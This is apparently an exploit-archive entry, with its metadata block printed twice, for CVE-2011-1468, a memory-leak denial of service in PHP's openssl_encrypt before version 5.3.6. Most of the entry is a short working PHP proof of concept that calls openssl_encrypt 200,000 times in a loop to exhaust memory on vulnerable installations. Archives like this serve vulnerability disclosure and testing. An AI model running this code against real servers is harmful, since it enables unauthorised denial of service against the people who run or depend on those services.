PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service
Author: dovbysh
type: dos
platform: php
port:
date_added: 2011-03-08
date_updated: 2014-12-08
verified: 1
codes: CVE-2011-1468;OSVDB-73754
tags:
aliases:
screenshot_url:
application_url:
raw file: 35486.php
type: dos
platform: php
port:
date_added: 2011-03-08
date_updated: 2014-12-08
verified: 1
codes: CVE-2011-1468;OSVDB-73754
tags:
aliases:
screenshot_url:
application_url:
raw file: 35486.php
source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition. Versions prior to PHP 5.3.6 are vulnerable. <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?>
Copyright © 2024 Irfan TOOR all rights reserved.